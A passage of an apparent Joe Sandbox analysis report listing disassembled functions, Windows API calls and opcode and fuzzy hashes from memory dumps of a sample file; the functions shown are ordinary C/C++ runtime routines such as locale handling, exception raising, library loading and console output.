                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
                            • String ID: bad locale name
                            • API String ID: 3553999535-1405518554
                            • Opcode ID: 71762c4f2f501b933416d6ab0329a6fb5c36cc442e6c0d82260126d04e615c00
                            • Instruction ID: aeda46a12bd7227a8fa06e110264899a607b7081c5a40faacb44e401bb0f3ac7
                            • Opcode Fuzzy Hash: 71762c4f2f501b933416d6ab0329a6fb5c36cc442e6c0d82260126d04e615c00
                            • Instruction Fuzzy Hash: 714171B5E05248ABDF12DFE4D855BDEFBB8AF18710F144069E804AB382E774DA04CB91
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0030243F
                              • Part of subcall function 0030E360: RaiseException.KERNEL32(E06D7363,00000001,00000003,003011AC,?,?,?,?,003011AC,?,0033D954), ref: 0030E3C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3109751735-1866435925
                            • Opcode ID: 059065d12314d0ccd1c6ac594a9ed9023d52636ba7cf55a281927bc43c52fbd4
                            • Instruction ID: db0f46b923edc2c74b59c093a01b53c5a0f393624cff06493779acfff64eb61c
                            • Opcode Fuzzy Hash: 059065d12314d0ccd1c6ac594a9ed9023d52636ba7cf55a281927bc43c52fbd4
                            • Instruction Fuzzy Hash: 1A1127BAA007086BC712DE58D856B97B3DCAF14310F14896AF918DB681F774A954CBE0
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00311288,00000000,?,003406A4,?,?,?,0031142B,00000004,InitializeCriticalSectionEx,0032DCA8,InitializeCriticalSectionEx), ref: 003112E4
                            • GetLastError.KERNEL32(?,00311288,00000000,?,003406A4,?,?,?,0031142B,00000004,InitializeCriticalSectionEx,0032DCA8,InitializeCriticalSectionEx,00000000,?,00311072), ref: 003112EE
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00311316
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID: api-ms-
                            • API String ID: 3177248105-2084034818
                            • Opcode ID: 408f735228af26e2e014d4155596b7dee522299533422925b230597d05c17463
                            • Instruction ID: 02a25d37862d2663dd5fd899d318ac2fa557461da5c6b5f70d33faffc92f67c4
                            • Opcode Fuzzy Hash: 408f735228af26e2e014d4155596b7dee522299533422925b230597d05c17463
                            • Instruction Fuzzy Hash: 42E04830740208FBDF271B61ED06BDD7E59AB08B40F118434FA0DA84E1D762D9558554
                            APIs
                            • GetConsoleOutputCP.KERNEL32(84FDAC87,00000000,00000000,00000000), ref: 0031BF93
                              • Part of subcall function 0031F3A3: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0031ED09,?,00000000,-00000008), ref: 0031F404
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0031C1E5
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0031C22B
                            • GetLastError.KERNEL32 ref: 0031C2CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                            • String ID:
                            • API String ID: 2112829910-0
                            • Opcode ID: 4c20048b047659029f1b5cf1325e10ee563ab25e565b8b77ec1c874108b5b561
                            • Instruction ID: 63c0afdf4bb25958d2d9f4e77cff353eaa4bfbadd5a19b27e6c1f49b66e69b6b
                            • Opcode Fuzzy Hash: 4c20048b047659029f1b5cf1325e10ee563ab25e565b8b77ec1c874108b5b561
                            • Instruction Fuzzy Hash: 1FD17A75E542589FCF1ACFE8C8909EDBBB9FF0D314F24452AE416EB251D630A982CB50
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 7fdb9dd1f1481e3a65dfaab32236fc22916896af1164fccc306ac20fba742c57
                            • Instruction ID: af379d4da69955c649f12b5a5dc694801ae22d05cc5104588a59f652603ad821
                            • Opcode Fuzzy Hash: 7fdb9dd1f1481e3a65dfaab32236fc22916896af1164fccc306ac20fba742c57
                            • Instruction Fuzzy Hash: 9851DE7A601202DFDB2E8F10D941BEA73A8FF48300F154829E9659B691EBB1ECC1CB50
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000), ref: 003260F0
                            • GetLastError.KERNEL32(?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000,00000000,00000000,?,0031C8C5,?), ref: 003260FC
                              • Part of subcall function 003260C2: CloseHandle.KERNEL32(FFFFFFFE,0032610C,?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000,00000000,00000000), ref: 003260D2
                            • ___initconout.LIBCMT ref: 0032610C
                              • Part of subcall function 00326084: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003260B3,00324AF1,00000000,?,0031C322,00000000,00000000,00000000,00000000), ref: 00326097
                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00324B04,00000000,00000001,0000000C,00000000,?,0031C322,00000000,00000000,00000000,00000000), ref: 00326121
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: b75e2105f573c431dbcec2c73b28d6671b0cd7784c2b1205e4cf648e31d86883
                            • Instruction ID: ebc1b0515950b4d8995aef73b62abf683e38ac9f700d4ed79ad131fa066252d1
                            • Opcode Fuzzy Hash: b75e2105f573c431dbcec2c73b28d6671b0cd7784c2b1205e4cf648e31d86883
                            • Instruction Fuzzy Hash: C5F0C036915164BBCF232F95EC06A9D3F6AFF087A5F058524FA1996531C6329C30EBD0
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0030D9C7
                            • GetCurrentThreadId.KERNEL32 ref: 0030D9D6
                            • GetCurrentProcessId.KERNEL32 ref: 0030D9DF
                            • QueryPerformanceCounter.KERNEL32(?), ref: 0030D9EC
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            • Opcode ID: 20010370f4c15845bbdd26a4db3f74f898e53243397a7abda639061795290e38
                            • Instruction ID: 93c363de6ed1b913abbe016b3e83b86b2426cb7184713f41d06b64a2c5c4936e
                            • Opcode Fuzzy Hash: 20010370f4c15845bbdd26a4db3f74f898e53243397a7abda639061795290e38
                            • Instruction Fuzzy Hash: 2CF0AF70C2020CEBCB05DBB4DA4899EBBF8EF1D300B91969AA412E6110E630AA498B50
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0030243F
                              • Part of subcall function 0030E360: RaiseException.KERNEL32(E06D7363,00000001,00000003,003011AC,?,?,?,?,003011AC,?,0033D954), ref: 0030E3C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID: ios_base::badbit set$ios_base::failbit set
                            • API String ID: 3109751735-1240500531
                            • Opcode ID: 0084649b0ddc7917ee29709f60c71197d1dbe60d34f10afc4562c30d08bc25b5
                            • Instruction ID: e76bea583e47643b737088c8c7b9c7eda8b0e0bffc59ce5e6858458e8805535a
                            • Opcode Fuzzy Hash: 0084649b0ddc7917ee29709f60c71197d1dbe60d34f10afc4562c30d08bc25b5
                            • Instruction Fuzzy Hash: 80414676910208ABCB06DF68DC95BAFF7B8FF45310F14825AF9149B681E774A940CBA0
                            APIs
                            • EncodePointer.KERNEL32(00000000,?), ref: 003108BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: EncodePointer
                            • String ID: MOC$RCC
                            • API String ID: 2118026453-2084237596
                            • Opcode ID: 5c4d140ceb9e289587c05addfb6deed56901b60f87a84538757895c957bf9f26
                            • Instruction ID: 89e4a147aab61f98d2a72e83a418e2c913ee9eb1ef8cf9f0fe2dd3bf41fe706d
                            • Opcode Fuzzy Hash: 5c4d140ceb9e289587c05addfb6deed56901b60f87a84538757895c957bf9f26
                            • Instruction Fuzzy Hash: 07418971900209EFDF1ADF98CD91AEEBBB5BF48304F158099F905AB262D3B599D0CB50